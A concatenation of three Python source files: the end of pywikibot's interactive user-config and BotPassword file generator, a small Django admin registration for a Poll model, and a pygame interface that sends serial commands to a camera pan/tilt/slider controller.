"""Create a new user directory."""
while True:
new_base = pywikibot.input('New user directory? ')
new_base = os.path.abspath(new_base)
if os.path.exists(new_base):
if os.path.isfile(new_base):
pywikibot.error('there is an existing file with that name.')
continue
# make sure user can read and write this directory
if not os.access(new_base, os.R_OK | os.W_OK):
pywikibot.error('directory access restricted')
continue
pywikibot.output('Using existing directory')
else:
try:
os.mkdir(new_base, pywikibot.config2.private_files_permission)
except Exception as e:
pywikibot.error('directory creation failed: {0}'.format(e))
continue
pywikibot.output('Created new directory.')
break
if new_base == pywikibot.config2.get_base_dir(new_base):
# config would find that file
return new_base
msg = fill("""WARNING: Your user files will be created in the directory
'%(new_base)s' you have chosen. To access these files, you will either have
to use the argument "-dir:%(new_base)s" every time you run the bot, or set
the environment variable "PYWIKIBOT_DIR" equal to this directory name in
your operating system. See your operating system documentation for how to
set environment variables.""" % {'new_base': new_base}, width=76)
pywikibot.output(msg)
if pywikibot.input_yn('Is this OK?', default=False, automatic_quit=False):
return new_base
pywikibot.output('Aborting changes.')
return False
def file_exists(filename):
"""Return whether the file exists and print a message if it exists."""
if os.path.exists(filename):
pywikibot.output('{1} already exists in the target directory "{0}".'
.format(*os.path.split(filename)))
return True
return False
def get_site_and_lang(default_family='wikipedia', default_lang='en',
default_username=None, force=False):
"""
Ask the user for the family, language and username.
@param default_family: The default family which should be chosen.
@type default_family: None or str
@param default_lang: The default language which should be chosen, if the
family supports this language.
@type default_lang: None or str
@param default_username: The default username which should be chosen.
@type default_username: None or str
@return: The family, language and username
@rtype: tuple of three str
"""
known_families = sorted(pywikibot.config2.family_files.keys())
if default_family not in known_families:
default_family = None
fam = pywikibot.bot.input_list_choice(
'Select family of sites we are working on, '
'just enter the number or name',
known_families,
force=force,
default=default_family)
fam = pywikibot.family.Family.load(fam)
if hasattr(fam, 'langs'):
if hasattr(fam, 'languages_by_size'):
by_size = [code for code in fam.languages_by_size
if code in fam.langs.keys()]
else:
by_size = []
known_langs = by_size + sorted(
set(fam.langs.keys()).difference(by_size))
else:
known_langs = []
if len(known_langs) == 0:
pywikibot.output('There were no known languages found in {}.'
.format(fam.name))
default_lang = None
elif len(known_langs) == 1:
pywikibot.output('The only known language: {0}'.format(known_langs[0]))
default_lang = known_langs[0]
else:
pywikibot.output('This is the list of known languages:')
pywikibot.output(', '.join(known_langs))
if default_lang not in known_langs:
if default_lang != 'en' and 'en' in known_langs:
default_lang = 'en'
else:
default_lang = None
message = "The language code of the site we're working on"
mycode = None
while not mycode:
mycode = pywikibot.input(message, default=default_lang, force=force)
if known_langs and mycode and mycode not in known_langs:
if not pywikibot.input_yn(
fill('The language code {} is not in the list of known '
'languages. Do you want to continue?'.format(mycode)),
default=False, automatic_quit=False):
mycode = None
message = 'Username on {0}:{1}'.format(mycode, fam.name)
username = pywikibot.input(message, default=default_username, force=force)
# Escape ''s
if username:
username = username.replace("'", "\\'")
return fam.name, mycode, username
EXTENDED_CONFIG = """# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, unicode_literals
# This is an automatically generated file. You can find more configuration
# parameters in 'config.py' file.
# The family of sites to work on by default.
#
# ‘site.py’ imports ‘families/xxx_family.py’, so if you want to change
# this variable, you need to use the name of one of the existing family files
# in that folder or write your own, custom family file.
#
# For ‘site.py’ to be able to read your custom family file, you must
# save it to ‘families/xxx_family.py’, where ‘xxx‘ is the codename of the
# family that your custom ‘xxx_family.py’ family file defines.
#
# You can also save your custom family files to a different folder. As long
# as you follow the ‘xxx_family.py’ naming convention, you can register your
# custom folder in this configuration file with the following global function:
#
# register_families_folder(folder_path)
#
# Alternatively, you can register particular family files that do not need
# to follow the ‘xxx_family.py’ naming convention using the following
# global function:
#
# register_family_file(family_name, file_path)
#
# Where ‘family_name’ is the family code (the ‘xxx’ in standard family file
# names) and ‘file_path’ is the absolute path to the target family file.
#
# If you use either of these functions to define the family to work on by
# default (the ‘family’ variable below), you must place the function call
# before the definition of the ‘family’ variable.
family = '{main_family}'
# The language code of the site we're working on.
mylang = '{main_code}'
# The dictionary usernames should contain a username for each site where you
# have a bot account. If you have a unique username for all languages of a
# family, you can use '*'
{usernames}
# The list of BotPasswords is saved in another file. Import it if needed.
# See https://www.mediawiki.org/wiki/Manual:Pywikibot/BotPasswords to know how
# to use them.
{botpasswords}
{config_text}"""
SMALL_CONFIG = """# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, unicode_literals
family = '{main_family}'
mylang = '{main_code}'
{usernames}
{botpasswords}
"""
PASSFILE_CONFIG = """# This is an automatically generated file used to store
# BotPasswords.
#
# As a simpler (but less secure) alternative to OAuth, MediaWiki allows bot
# users to use BotPasswords to limit the permissions given to a bot.
# When using BotPasswords, each instance gets its own bot name and generated
# password. This combination can only access the API, not the normal web
# interface.
#
# See https://www.mediawiki.org/wiki/Manual:Pywikibot/BotPasswords for more
# information.
{botpasswords}"""
def parse_sections():
"""Parse sections from config2.py file.
config2.py will be in the pywikibot/ directory relative to this
generate_user_files script.
@return: a list of ConfigSection named tuples.
@rtype: list
"""
data = []
ConfigSection = namedtuple('ConfigSection', 'head, info, section')
install = os.path.dirname(os.path.abspath(__file__))
with codecs.open(os.path.join(install, 'pywikibot', 'config2.py'),
'r', 'utf-8') as config_f:
config_file = config_f.read()
result = re.findall(
'^(?P<section># #{5,} (?P<head>[A-Z][A-Z_ ]+[A-Z]) #{5,}\r?\n'
'(?:^#?\r?\n)?' # There may be an empty or short line after header
'(?P<comment>(?:^# .+?)+)' # first comment is used as help string
'^.*?)' # catch the remaining text
'^(?=# #{5,}|# ={5,})', # until section end marker
config_file, re.MULTILINE | re.DOTALL)
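    # findall with multiple groups yields (section, head, comment) tuples in
    # group order: the full section text, its header title, and the leading
    # comment block that becomes the help string.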
for section, head, comment in result:
info = ' '.join(text.strip('# ') for text in comment.splitlines())
data.append(ConfigSection(head, info, section))
return data
def copy_sections():
"""Take config sections and copy them to user-config.py.
@return: config text of all selected sections.
@rtype: str
"""
result = []
sections = parse_sections()
# copy settings
for section in filter(lambda x: x.head not in (DISABLED_SECTIONS
| OBSOLETE_SECTIONS),
sections):
result.append(section.section)
return ''.join(result)
def create_user_config(main_family, main_code, main_username, force=False):
"""
Create a user-config.py in base_dir.
Create a user-password.py if necessary.
"""
_fnc = os.path.join(base_dir, USER_BASENAME)
_fncpass = os.path.join(base_dir, PASS_BASENAME)
useritem = namedtuple('useritem', 'family, code, name')
userlist = []
if force and not config.verbose_output:
if main_username:
userlist = [useritem(main_family, main_code, main_username)]
else:
while True:
userlist += [useritem(*get_site_and_lang(
main_family, main_code, main_username, force=force))]
if not pywikibot.input_yn('Do you want to add any other projects?',
force=force,
default=False, automatic_quit=False):
break
# For each different username entered, ask if user wants to save a
# BotPassword (username, BotPassword name, BotPassword pass)
    msg = fill('See {}/BotPasswords to know how to get codes. '
               'Please note that the BotPassword is saved in plain text in {} '
               'and anyone with read access to that directory will be able '
               'to read the file.'
               .format(__url__, _fncpass))
botpasswords = []
userset = {user.name for user in userlist}
for username in userset:
if pywikibot.input_yn('Do you want to add a BotPassword for {}?'
.format(username), force=force, default=False):
if msg:
pywikibot.output(msg)
msg = None
message = 'BotPassword\'s "bot name" for {}'.format(username)
botpasswordname = pywikibot.input(message, force=force)
message = 'BotPassword\'s "password" for "{}" ' \
'(no characters will be shown)' \
.format(botpasswordname)
botpasswordpass = pywikibot.input(message, force=force,
password=True)
if botpasswordname and botpasswordpass:
botpasswords.append((username, botpasswordname,
botpasswordpass))
if not userlist: # Show a sample
usernames = "# usernames['{}']['{}'] = u'MyUsername'".format(
main_family, main_code)
else:
usernames = '\n'.join(
"usernames['{user.family}']['{user.code}'] = u'{user.name}'"
.format(user=user) for user in userlist)
# Arbitrarily use the first key as default settings
main_family, main_code = userlist[0].family, userlist[0].code
botpasswords = '\n'.join(
"('{0}', BotPassword('{1}', '{2}'))".format(*botpassword)
for botpassword in botpasswords)
config_text = copy_sections()
if config_text:
config_content = EXTENDED_CONFIG
else:
pywikibot.output('Creating a small variant of user-config.py')
config_content = SMALL_CONFIG
try:
# Finally save user-config.py
with codecs.open(_fnc, 'w', 'utf-8') as f:
f.write(config_content.format(
main_family=main_family,
main_code=main_code,
usernames=usernames,
config_text=config_text,
botpasswords='password_file = ' + ('"{}"'.format(PASS_BASENAME)
if botpasswords
else 'None')))
pywikibot.output("'%s' written." % _fnc)
except BaseException:
if os.path.exists(_fnc):
os.remove(_fnc)
raise
if botpasswords:
        # Save user-password.py if necessary
try:
# First create an empty file with good permissions, before writing
# in it
with codecs.open(_fncpass, 'w', 'utf-8') as f:
f.write('')
pywikibot.tools.file_mode_checker(_fncpass, mode=0o600,
quiet=True)
with codecs.open(_fncpass, 'w', 'utf-8') as f:
f.write(PASSFILE_CONFIG.format(botpasswords=botpasswords))
pywikibot.tools.file_mode_checker(_fncpass, mode=0o600)
pywikibot.output("'{0}' written.".format(_fncpass))
except EnvironmentError:
os.remove(_fncpass)
raise
def ask_for_dir_change(force):
"""Ask whether the base directory is has to be changed.
Only give option for directory change if user-config.py or user-password
already exists in the directory. This will repeat if user-config.py also
exists in the requested directory.
@param force: Skip asking for directory change
@type force: bool
@return: whether user file or password file exists already
@rtype: tuple of bool
"""
global base_dir
pywikibot.output('\nYour default user directory is "{}"'.format(base_dir))
while True:
# Show whether file exists
userfile = file_exists(os.path.join(base_dir, USER_BASENAME))
passfile = file_exists(os.path.join(base_dir, PASS_BASENAME))
if force and not config.verbose_output or not (userfile or passfile):
break
if pywikibot.input_yn(
'Would you like to change the directory?',
default=True, automatic_quit=False, force=force):
new_base = change_base_dir()
if new_base:
base_dir = new_base
else:
break
return userfile, passfile
def main(*args):
"""
Process command line arguments and generate user-config.
If args is an empty list, sys.argv is used.
@param args: command line arguments
@type args: unicode
"""
# set the config family and mylang values to an invalid state so that
# the script can detect that the command line arguments -family & -lang
    # were used and handle_args has updated these config values,
# and 'force' mode can be activated below.
(config.family, config.mylang) = ('wikipedia', None)
local_args = pywikibot.handle_args(args)
if local_args:
pywikibot.output('Unknown arguments: %s' % ' '.join(local_args))
return False
pywikibot.output('You can abort at any time by pressing ctrl-c')
if config.mylang is not None:
force = True
pywikibot.output('Automatically generating user-config.py')
else:
force = False
# Force default site of en.wikipedia
config.family, config.mylang = 'wikipedia', 'en'
username = config.usernames[config.family].get(config.mylang)
try:
has_userfile, has_passfile = ask_for_dir_change(force)
if not (has_userfile or has_passfile):
create_user_config(config.family, config.mylang, username,
force=force)
except KeyboardInterrupt:
pywikibot.output('\nScript terminated by user.')
# Creation of user-fixes.py has been replaced by an example file.
if __name__ == '__main__':
main()
|
py | 1a40ca2077364156a7eb4b41dcdb2764c51d852b | from django.contrib import admin
from .models import Poll
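# Register the Poll model with the Django admin site; list_display sets the
# columns shown in the admin change list.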
@admin.register(Poll)
class PollAdmin(admin.ModelAdmin):
list_display = ('name', 'last_name', 'email', 'last_module', 'phone_number')
|
py | 1a40ca4831047eeaa2624ad4ac2cb6ddcc38cbc6 | import pygame
from pygame.cursors import tri_left
import pygame_gui
import time
import serial.tools.list_ports
import os, sys
import math
from collections import deque
from pygame_gui import UIManager
from pygame_gui.elements import UIButton
from pygame_gui.elements import UITextEntryLine
from pygame_gui.elements import UIDropDownMenu
from pygame_gui.elements import UILabel
from pygame_gui.elements.ui_text_box import UITextBox
from pygame_gui.windows import UIConfirmationDialog
from serial import *
from pathlib import Path
def find_data_file(filename):
if getattr(sys, "frozen", False):
datadir = os.path.dirname(sys.executable)
else:
datadir = os.path.dirname(__file__)
return os.path.join(datadir, filename)
try: # Needed for macOS "py2app"
base_path = Path(__file__).parent
image_path = (base_path / "./PTSApp-Icon.png").resolve()
gameIcon = pygame.image.load(image_path)
pygame.display.set_icon(gameIcon)
except: # Needed for Windows "cx_freeze"
imageFile = "PTSApp-Icon.png"
imageFilePath = find_data_file(imageFile)
gameIcon = pygame.image.load(imageFilePath)
pygame.display.set_icon(gameIcon)
pygame.font.init()
myfont = pygame.font.SysFont('Trebuchet MS', 30)
myfontsmall = pygame.font.SysFont('Trebuchet MS', 20)
clk = pygame.time.Clock()
interval = 200
intervalReport = 100
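# interval values are in milliseconds (compared against pygame.time.get_ticks())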
baudRate = 38400 #57600 or 38400
speedFastX = 's20'
speedFastY = 'S20'
speedFastZ = 'X60'
speedSlowX = 's10'
speedSlowY = 'S10'
speedSlowZ = 'X30'
ser = ''
serBuffer = ''
serialText = ''
joystick = ''
joystickName = ''
button0Pressed = False
button1Pressed = False
button2Pressed = False
button3Pressed = False
button4Pressed = False
button5Pressed = False
button6Pressed = False
button7Pressed = False
button8Pressed = False
button9Pressed = False
button10Pressed = False
button11Pressed = False
button12Pressed = False
button13Pressed = False
button14Pressed = False
button15Pressed = False
button16Pressed = False
pos1set = False
pos2set = False
pos3set = False
pos4set = False
pos5set = False
pos6set = False
pos1run = False
pos2run = False
pos3run = False
pos4run = False
pos5run = False
pos6run = False
atPos1 = False
atPos2 = False
atPos3 = False
atPos4 = False
atPos5 = False
atPos6 = False
speedIsFast = True
speedRec = False
blinkSet = False
canSendReport = False
textBoxJoystickNames = None
joyCircle_draging = False
sliderCircle_draging = False
offset_x = 0.0
sliderOffset_x = 0.0
offset_y = 0.0
sliderOffset_y = 0.0
textBoxSerial = None
arr = []
oldAxisX = 0
oldAxisY = 0
oldAxisZ = 0
axisX = 0
axisY = 0
axisZ = 0
data = bytearray(7)
hat = ()
oldHatX = 0
oldHatY = 0
previousTime = time.time()
RED = (255, 0, 0)
GREEN = (0, 255, 0)
OFF = (33, 40, 45)
mouseBorder = 360
radius = 15
mouseMoving = False
joyXreadDOT = 0.0
joyYreadDOT = 0.0
joyZreadDOT = 0.0
panKeyPresseed = False
tiltKeyPresseed = False
sliderKeyPresseed = False
isZooming = False
colour_light = (99,104,107)
colour_dark = (76,80,82)
colour = (255,255,255)
zoomINtext = myfontsmall.render('IN' , True , colour)
zoomOUTtext = myfontsmall.render('OUT' , True , colour)
textsurfaceW = myfont.render('w', False, (89, 89, 89))
textsurfaceA = myfont.render('a', False, (89, 89, 89))
textsurfaceS = myfont.render('s', False, (89, 89, 89))
textsurfaceD = myfont.render('d', False, (89, 89, 89))
textsurfaceLeft = myfont.render(',', False, (89, 89, 89))
textsurfaceRight = myfont.render('.', False, (89, 89, 89))
resolution = (1200, 660)
fullscreen = False
pygame.init()
pygame.display.set_caption("PTSApp")
previousTicks = pygame.time.get_ticks() + interval
previousTicksReport = pygame.time.get_ticks() + intervalReport
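# The helpers below each send a short ASCII command to the pan/tilt/slider
# controller. The '^' prefix plus a letter and optional value (e.g. '^T1' to
# tilt, '^P-10' to pan, '^L100' to move the slider) is inferred from the
# function names; the firmware protocol itself is not documented in this file.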
def sendUP1():
temp='^T1'
sendSerial(temp)
def sendDOWN1():
temp='^T-1'
sendSerial(temp)
def sendLEFT1():
temp='^P-0.5'
sendSerial(temp)
def sendRIGHT1():
temp='^P0.5'
sendSerial(temp)
def sendUP10():
temp='^T10'
sendSerial(temp)
def sendDOWN10():
temp='^T-10'
sendSerial(temp)
def sendLEFT10():
temp='^P-10'
sendSerial(temp)
def sendRIGHT10():
temp='^P10'
sendSerial(temp)
def sendRESETpos():
temp='^h'
sendSerial(temp)
def sendSR1():
temp='^L10'
sendSerial(temp)
def sendSR10():
temp='^L100'
sendSerial(temp)
def sendSL1():
temp='^L-10'
sendSerial(temp)
def sendSL10():
temp='^L-100'
sendSerial(temp)
def sendZOOMin():
temp='^Z'
sendSerial(temp)
def sendZOOMout():
temp='^z'
sendSerial(temp)
def sendZOOMstop():
temp='^N'
sendSerial(temp)
def sendSET1():
temp='^a'
sendSerial(temp)
def sendSET2():
temp='^b'
sendSerial(temp)
def sendSET3():
temp='^c'
sendSerial(temp)
def sendSET4():
temp='^d'
sendSerial(temp)
def sendSET5():
temp='^e'
sendSerial(temp)
def sendSET6():
temp='^f'
sendSerial(temp)
def sendGO1():
temp='^A'
sendSerial(temp)
def sendGO2():
temp='^B'
sendSerial(temp)
def sendGO3():
temp='^C'
sendSerial(temp)
def sendGO4():
temp='^D'
sendSerial(temp)
def sendGO5():
temp='^E'
sendSerial(temp)
def sendGO6():
temp='^F'
sendSerial(temp)
def sendSPEEDfast():
temp='^V'
sendSerial(temp)
def sendSPEEDslow():
temp='^v'
sendSerial(temp)
def sendREPORTall():
temp='^R'
sendSerial(temp)
def sendREPORTpos():
global canSendReport
global previousTicksReport
temp='^W'
sendSerial(temp)
canSendReport = True
previousTicksReport = pygame.time.get_ticks() + intervalReport
def clearPosConfirm():
message_window = UIConfirmationDialog(pygame.Rect((650, 200), (300, 200)),
ui_manager,
action_long_desc='Clear All Position Data?')
def sendCLEARALLpos():
temp='^Y'
sendSerial(temp)
def sendCLEARtext():
global serialText
serialText = ''
textBoxSerial.kill()
serialPortTextBox()
def serialPort_changed():
global ser
global baudRate
global current_serialPort
global serialText
global drop_down_serial
serialPortSelect = drop_down_serial.selected_option
try:
ser = Serial(serialPortSelect , baudRate, timeout=0, writeTimeout=0)
temp='^W'
sendSerial(temp)
readSerial()
except:
ser = ''
serialNotSel = 'Serial port not available!<br>'
textBoxSerial.kill()
serialText = serialNotSel + serialText
serialPortTextBox()
drop_down_serial.kill()
drop_down_serial = UIDropDownMenu(available_ports, # Recreate serial port drop down list
current_serialPort[0], # Currently selected port
pygame.Rect((620,95),
(250, 30)),
ui_manager)
def tohex(val, nbits):
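    # Two's-complement hex of val in an nbits-wide field,
    # e.g. tohex(-1, 16) -> '0xffff' and tohex(255, 16) -> '0xff'.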
return hex((val + (1 << nbits)) % (1 << nbits))
def sendJoystick(arr):
global ser
global data
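    # Pack the hex strings in arr into a 7-byte packet: byte 0 = 4 (packet
    # type), bytes 1-2 = slider, 3-4 = pan, 5-6 = tilt, each pair being a
    # sign/high byte (0 or 255) plus a low byte. Layout inferred from the
    # packing logic below; the receiving firmware is not documented here.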
sliderInt = int(arr[1], 16)
panInt = int(arr[2], 16)
tiltInt = int(arr[3], 16)
data[0] = 4
if ((sliderInt > 0) and (sliderInt < 256)):
data[1] = 0
data[2] = sliderInt
elif sliderInt > 257:
data[1] = 255
data[2] = (sliderInt-65281)
else:
data[1] = 0
data[2] = 0
if ((panInt > 0) and (panInt < 256)):
data[3] = 0
data[4] = panInt
elif panInt > 257:
data[3] = 255
data[4] = (panInt-65281)
else:
data[3] = 0
data[4] = 0
if ((tiltInt > 0) and (tiltInt < 256)):
data[5] = 0
data[6] = tiltInt
elif tiltInt > 257:
data[5] = 255
data[6] = (tiltInt-65281)
else:
data[5] = 0
data[6] = 0
if ser == '':
pass
else:
ser.write(data)
#print(data)
def serialPortTextBox():
global textBoxSerial
textBoxSerial = UITextBox('<font face=roboto size=5 color=#F0F0F0>' + serialText + '</font>',
pygame.Rect((620, 130), (560, 510)),
ui_manager)
#wrap_to_height=False)
def textBoxJoystickName():
global joystickName
global textBoxJoystickNames
textBoxJoystickNames = UITextBox(joystickName,
pygame.Rect((620, 30), (560, 35)),
ui_manager)
def readSerial():
global ser
global serBuffer
global serialText
global atPos1
global atPos2
global atPos3
global atPos4
global atPos5
global atPos6
global pos1set
global pos2set
global pos3set
global pos4set
global pos5set
global pos6set
global pos1run
global pos2run
global pos3run
global pos4run
global pos5run
global pos6run
global speedIsFast
global speedRec
if (ser == ''):
return
else:
while True:
c = ser.read()
if len(c) == 0:
break
if (c == b'\x04'): # Ignore received joystick commands from other remote
c = ser.read()
c = ser.read()
c = ser.read()
c = ser.read()
c = ser.read()
c = ser.read()
c = ''
elif (c == b'^'):
c = ser.read()
c = ''
elif (c == b'\xb0'): # Change / remove characters that cause error
c = '°'
elif (c == b'\xb2'):
c = '²'
elif (c == b'\xba') or (c == b'\xc2') or (c == b'\xc9'):
c = ''
            elif (c == b'\x23'):  # '#' marks a status byte from the controller; decode it and drop it from the text output
c = ser.read()
if c == b'A':
#atPos1 = True
pos1set = True
elif c == b'B':
#atPos2 = True
pos2set = True
elif c == b'C':
#atPos3 = True
pos3set = True
elif c == b'D':
#atPos4 = True
pos4set = True
elif c == b'E':
pos5set = True
#atPos5 = True
elif c == b'F':
#atPos6 = True
pos6set = True
elif c == b'J':
atPos1 = False
atPos2 = False
atPos3 = False
atPos4 = False
atPos5 = False
atPos6 = False
pos1run = True
elif c == b'K':
atPos1 = False
atPos2 = False
atPos3 = False
atPos4 = False
atPos5 = False
atPos6 = False
pos2run = True
elif c == b'L':
atPos1 = False
atPos2 = False
atPos3 = False
atPos4 = False
atPos5 = False
atPos6 = False
pos3run = True
elif c == b'M':
atPos1 = False
atPos2 = False
atPos3 = False
atPos4 = False
atPos5 = False
atPos6 = False
pos4run = True
elif c == b'N':
atPos1 = False
atPos2 = False
atPos3 = False
atPos4 = False
atPos5 = False
atPos6 = False
pos5run = True
elif c == b'O':
atPos1 = False
atPos2 = False
atPos3 = False
atPos4 = False
atPos5 = False
atPos6 = False
pos6run = True
elif c == b'a':
pos1run = False
atPos1 = True
elif c == b'b':
pos2run = False
atPos2 = True
elif c == b'c':
pos3run = False
atPos3 = True
elif c == b'd':
pos4run = False
atPos4 = True
elif c == b'e':
pos5run = False
atPos5 = True
elif c == b'f':
pos6run = False
atPos6 = True
elif c == b'Y':
pos1run = False
pos1set = False
atPos1 = False
pos2run = False
pos2set = False
atPos2 = False
pos3run = False
pos3set = False
atPos3 = False
pos4run = False
pos4set = False
atPos4 = False
pos5run = False
pos5set = False
atPos5 = False
pos6run = False
pos6set = False
atPos6 = False
elif c == b'y':
atPos1 = False
atPos2 = False
atPos3 = False
atPos4 = False
atPos5 = False
atPos6 = False
elif c == b'V':
speedIsFast = True
speedRec = True
elif c == b'v':
speedIsFast = False
speedRec = True
#c = '\n'
c = ''
else:
c = c.decode('ascii')
            if (c == '\r'): # check if character is a delimiter
c = '' # don't want returns. chuck it
if (c == '\t'): # check if character is a tab
                c = '<br>'  # render the tab as an HTML line break
if c == '\n':
serBuffer += '<br>' # replace \n with HTML <br>
#textOUTPUT.insert(END, serBuffer) # code for tkinter
#textOUTPUT.see(END) # code for tkinter
#serialText += serBuffer # code for tkinter
textBoxSerial.kill()
serialText = serBuffer + serialText
serialPortTextBox()
serBuffer = '' # empty the buffer
else:
serBuffer += c # add to the buffer
def sendSerial(sendValue):
global ser
global serialText
if (ser == ''): # Checks to see if com port has been selected
serialNotSel = 'Serial port not selected!<br>'
textBoxSerial.kill()
serialText = serialNotSel + serialText
serialPortTextBox()
#textOUTPUT.insert(END, 'Serial port not selected!\n') # code for tkinter
#textOUTPUT.see(END) # code for tkinter
else:
        ser.write(sendValue.encode()) # Send button value to connected com port
def scale(val, src, dst):
# Scale the given value from the scale of src to the scale of dst.
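    # e.g. scale(0.5, (0.0, 1.0), (0, 255)) -> 127.5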
return ((val - src[0]) / (src[1]-src[0])) * (dst[1]-dst[0]) + dst[0]
def initialiseJoysticks():
global joystick
global joystickName
available_joysticks = [] # for returning
pygame.joystick.init() # Initialise the Joystick sub-module
joystick_count = pygame.joystick.get_count() # Get count of joysticks
for i in range( joystick_count ): # For each joystick:
joystick = pygame.joystick.Joystick( i )
joystick.init()
available_joysticks.append( joystick )
if ( len( available_joysticks ) == 0 ):
joystickName = "No joystick found."
#print( "No joystick found." )
else:
for i,joystk in enumerate( available_joysticks ):
joystickName = joystk.get_name()
#print("Joystick %d is named [%s]" % ( i, joystickName ) )
return available_joysticks
def int_to_bytes(number: int) -> bytes:
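    # Minimal-length signed big-endian encoding,
    # e.g. int_to_bytes(255) -> b'\x00\xff' and int_to_bytes(-1) -> b'\xff'.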
return number.to_bytes(length=(8 + (number + (number < 0)).bit_length()) // 8, byteorder='big', signed=True)
def doRefresh():
global drop_down_serial
global ser
global current_serialPort
global baudRate
usb_port = 'usbserial'
wchusb_port = 'wchusbserial'
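    # 'usbserial' / 'wchusbserial' match the device names macOS typically gives
    # FTDI- and CH340-based USB-serial adapters; the first matching port is
    # opened automatically, otherwise the user picks one from the drop-down.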
current_serialPort = ' - '
drop_down_serial.kill() # Clear serial port drop down box
ports = serial.tools.list_ports.comports() # Search for attached serial ports
available_ports = []
for p in ports:
available_ports.append(p.device) # Append each found serial port to array available_ports
if current_serialPort == ' - ':
if (wchusb_port in '\t'.join(available_ports)):
try:
current_serialPort = [string for string in available_ports if wchusb_port in string]
ser = Serial(current_serialPort[0], baudRate, timeout=0, writeTimeout=0)
temp='^W'
sendSerial(temp)
readSerial()
except:
current_serialPort = [' - ']
elif (usb_port in '\t'.join(available_ports)):
try:
current_serialPort = [string for string in available_ports if usb_port in string]
ser = Serial(current_serialPort[0], baudRate, timeout=0, writeTimeout=0)
temp='^W'
sendSerial(temp)
readSerial()
except:
current_serialPort = [' - ']
else:
current_serialPort = [' - ']
drop_down_serial = UIDropDownMenu(available_ports, # Recreate serial port drop down list
current_serialPort[0], # Currently selected port
pygame.Rect((620,95),
(250, 30)),
ui_manager)
initialiseJoysticks()
textBoxJoystickName()
initialiseJoysticks()
if fullscreen:
window_surface = pygame.display.set_mode(resolution,
pygame.FULLSCREEN)
else:
window_surface = pygame.display.set_mode(resolution)
background_surface = None
try:
base_path = Path(__file__).parent # Needed for macOS "py2app"
file_path = (base_path / "./theme.json").resolve()
ui_manager = UIManager(resolution, file_path)
except:
themeFile = "theme.json"
themeFilePath = find_data_file(themeFile)
ui_manager = UIManager(resolution, themeFilePath)
running = True
clock = pygame.time.Clock()
time_delta_stack = deque([])
button_response_timer = pygame.time.Clock()
ui_manager.set_window_resolution(resolution)
ui_manager.clear_and_reset()
background_surface = pygame.Surface(resolution)
background_surface.fill(ui_manager.get_theme().get_colour('dark_bg'))
rel_button_L1 = UIButton(pygame.Rect((120, 180), (60, 60)), '.5', ui_manager, object_id='#everything_button')
rel_button_L10 = UIButton(pygame.Rect((60, 180), (60, 60)), '10', ui_manager, object_id='#everything_button')
rel_button_R1 = UIButton(pygame.Rect((240, 180), (60, 60)), '.5', ui_manager, object_id='#everything_button')
rel_button_R10 = UIButton(pygame.Rect((300, 180), (60, 60)), '10', ui_manager, object_id='#everything_button')
rel_button_U1 = UIButton(pygame.Rect((180, 120), (60, 60)), '.5', ui_manager, object_id='#everything_button')
rel_button_U10 = UIButton(pygame.Rect((180, 60), (60, 60)), '10', ui_manager, object_id='#everything_button')
rel_button_D1 = UIButton(pygame.Rect((180, 240), (60, 60)), '.5', ui_manager, object_id='#everything_button')
rel_button_D10 = UIButton(pygame.Rect((180, 300), (60, 60)), '10', ui_manager, object_id='#everything_button')
#rel_button_set0 = UIButton(pygame.Rect((190, 190), (40, 40)), '0', ui_manager) # Resets position back to zero
rel_button_SL10 = UIButton(pygame.Rect((120, 400), (60, 60)), '10', ui_manager, object_id='#everything_button')
rel_button_SL100 = UIButton(pygame.Rect((60, 400), (60, 60)), '100', ui_manager, object_id='#everything_button')
rel_button_SR10 = UIButton(pygame.Rect((240, 400), (60, 60)), '10', ui_manager, object_id='#everything_button')
rel_button_SR100 = UIButton(pygame.Rect((300, 400), (60, 60)), '100', ui_manager, object_id='#everything_button')
rel_button_SET1 = UIButton(pygame.Rect((30, 560), (60, 60)), 'SET 1', ui_manager, object_id='#everything_button')
rel_button_SET2 = UIButton(pygame.Rect((90, 560), (60, 60)), 'SET 2', ui_manager, object_id='#everything_button')
rel_button_SET3 = UIButton(pygame.Rect((150, 560), (60, 60)), 'SET 3', ui_manager, object_id='#everything_button')
rel_button_SET4 = UIButton(pygame.Rect((210, 560), (60, 60)), 'SET 4', ui_manager, object_id='#everything_button')
rel_button_SET5 = UIButton(pygame.Rect((270, 560), (60, 60)), 'SET 5', ui_manager, object_id='#everything_button')
rel_button_SET6 = UIButton(pygame.Rect((330, 560), (60, 60)), 'SET 6', ui_manager, object_id='#everything_button')
rel_button_GO1 = UIButton(pygame.Rect((30, 500), (60, 60)), 'GO 1', ui_manager, object_id='#everything_button')
rel_button_GO2 = UIButton(pygame.Rect((90, 500), (60, 60)), 'GO 2', ui_manager, object_id='#everything_button')
rel_button_GO3 = UIButton(pygame.Rect((150, 500), (60, 60)), 'GO 3', ui_manager, object_id='#everything_button')
rel_button_GO4 = UIButton(pygame.Rect((210, 500), (60, 60)), 'GO 4', ui_manager, object_id='#everything_button')
rel_button_GO5 = UIButton(pygame.Rect((270, 500), (60, 60)), 'GO 5', ui_manager, object_id='#everything_button')
rel_button_GO6 = UIButton(pygame.Rect((330, 500), (60, 60)), 'GO 6', ui_manager, object_id='#everything_button')
rel_button_CLEARALL = UIButton(pygame.Rect((390, 545), (100, 30)), 'Clear ALL', ui_manager, object_id='#everything_button')
rel_button_Refresh = UIButton(pygame.Rect((430, 35), (160, 35)), 'Refresh Ports', ui_manager, object_id='#everything_button')
rel_button_FAST = UIButton(pygame.Rect((480, 100), (60, 60)), 'FAST', ui_manager, object_id='#everything_button')
rel_button_SLOW = UIButton(pygame.Rect((480, 160), (60, 60)), 'SLOW', ui_manager, object_id='#everything_button')
rel_button_REPORT = UIButton(pygame.Rect((510, 470), (100, 60)), 'Report All', ui_manager, object_id='#everything_button')
rel_button_REPORTPOS = UIButton(pygame.Rect((510, 530), (100, 60)), 'Report Pos', ui_manager, object_id='#everything_button')
rel_button_CLEARtext = UIButton(pygame.Rect((510, 600), (100, 40)), 'Clear Text', ui_manager, object_id='#everything_button')
joystick_label = UILabel(pygame.Rect(540, 10, 230, 24), "Joystick", ui_manager)#, object_id='#main_text_entry')
serial_text_entry = UITextEntryLine(pygame.Rect((930, 95), (250, 35)), ui_manager, object_id='#main_text_entry')
serial_port_label = UILabel(pygame.Rect(550, 70, 230, 24), "Serial Port", ui_manager)
serial_command_label = UILabel(pygame.Rect(870, 70, 230, 24), "Serial Command", ui_manager)
usb_port = 'usbserial'
wchusb_port = 'wchusbserial'
current_serialPort = ' - '
ports = serial.tools.list_ports.comports() # Search for attached serial ports
available_ports = []
